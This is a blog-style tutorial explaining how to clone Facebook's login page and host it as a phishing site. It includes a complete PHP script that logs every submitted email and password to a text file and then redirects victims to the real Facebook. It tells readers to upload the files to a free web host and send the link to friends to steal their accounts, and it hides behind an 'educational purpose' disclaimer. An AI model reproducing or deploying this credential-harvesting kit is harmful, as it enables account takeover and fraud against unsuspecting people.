mirmee

search this website

How to create a phising site to hack a Facebook account?

I surfed through internet about this fact, on how to hack a facebook account but was of no use since the videos on youtube were useful and fake as well. So i decided to write a post in it. And be sure it really works and it is just for educational purpose and i wouldn't be responsible for any act. The steps are all clear here and just follow the steps. Lets get started:
Step 1: Go to Facebook and right click and view source code.
                                                                                                                                                                     
       Step 2: Copy the codes in notepad. From notepad press CTRL+F,and type ACTION. .You will have to find a text which looks like ..action="https://www.facebook.com/login.php?login_attempt=1" replace it with post.php and it looks like this action="post.php" .                                                                         
                                                                 
      Step 3: Save the file to desktop as index.html.                                                                                             
                                                         
Step 4: Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

Step 5: Now create a free webhost account. I recommend 000webhost.com . Go to 000webhost and sign up for a free account. In the form use the subdomain they provide.                          
                                                                           
Step 7: Click on public_html and you will find two files there by default. Delete these files and click upload.Then upload the files, index.html and post.php one by one there.
                                                         
 Step 8: After you have uploaded the files, open your site in next tab. It opens as facebook's homepage but it is fake site you have created. Whenever your victim enters your facebook email and password to your link a file will be created in your public_html. Click view from there and it will show you the victims email and password. You are all done now, just send your site's link to your friends via email and start hacking.

Note: This info is just for educational purpose and don't use it for illegal purpose. I won't be responsible for any kind of internet crime